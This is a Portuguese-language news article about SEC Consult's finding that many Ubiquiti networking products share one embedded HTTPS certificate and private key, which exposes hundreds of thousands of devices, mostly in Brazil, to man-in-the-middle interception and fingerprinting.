Ubiquiti: falha expõe dispositivos conectados a esta rede

“Um certificado, incluindo sua chave privada, está embutido no firmware de vários produtos Ubiquiti Networks. Este certificado é usado para o serviço HTTPS (certificado de servidor padrão para o gerenciamento baseado na Web) e é o mesmo em todos os dispositivos “, explicou SEC Consult.

A vulnerabilidade permite a um atacante MITM (man-in-the-middle) interceptar comunicações e acessar informações confidenciais, tais como credenciais de administrador.

Enquanto essa falha não é fácil de explorar – o invasor precisa obter acesso privilegiado à rede da vítima – o “bug” de segurança também pode ser aproveitado para identificar dispositivos Ubiquiti expostos à Web.

Em resumo, há um compartilhamento de certificados digitais entre vários equipamentos, permitindo que um atacante acesse milhares de equipamentos usando a mesma chave de acesso – algo já detectado recentemente, em outros dispositivos de outros fabricantes.

Usando esta falha, a SEC Consult identificou 600.000 dispositivos (41% deles no BRASIL!). Um novo serviço da Universidade de Michigan, o Projeto Censys, revelou a existência de 1,1 milhões de dispositivos Ubiquiti usando o mesmo certificado. A maioria dos dispositivos de rede afetados estão localizados no Brasil (480.000), Tailândia (170.000) e Estados Unidos (77 mil).

O certificado e a chave privada foram identificados no firmware de muitos produtos, incluindo AF, AG, AR, AirGrid, BM, Bala, LiteStation, PicoStation, NanoStation, MiniStation, , airGateway, Loco, Alimentação AP, PBE, PBM, NBE , dispositivos da série NSM, NB, e RM.

Ubiquiti: falha expõe dispositivos conectados a esta rede

A empresa de segurança de aplicativos relatou suas conclusões ao Ubiquiti Networks em meados de agosto através da plataforma HackerOne. O vendedor prometeu começar a gerar certificados exclusivos para cada produto durante a geração de chaves SSH, mas não está claro se ele planeja fazer o mesmo para certificados SSL.

Em resposta aos recentes relatórios sobre infecções por malware e abuso de DDoS, Ubiquiti Networks observou em seu fórum da comunidade que tinha inicialmente desativado o recurso de gerenciamento remoto por padrão, mas reverteu a configuração depois de receber numerosas queixas de clientes que necessitavam o recurso.

Ou seja: se sua empresa possui dispositivos usando esta rede e padrão, fique muito atento. Esta falha já está amplamente disseminada em foruns de hackers e tem-se como certo que já há atores maliciosos utilizando a falha em busca de dispositivos vulneráveis!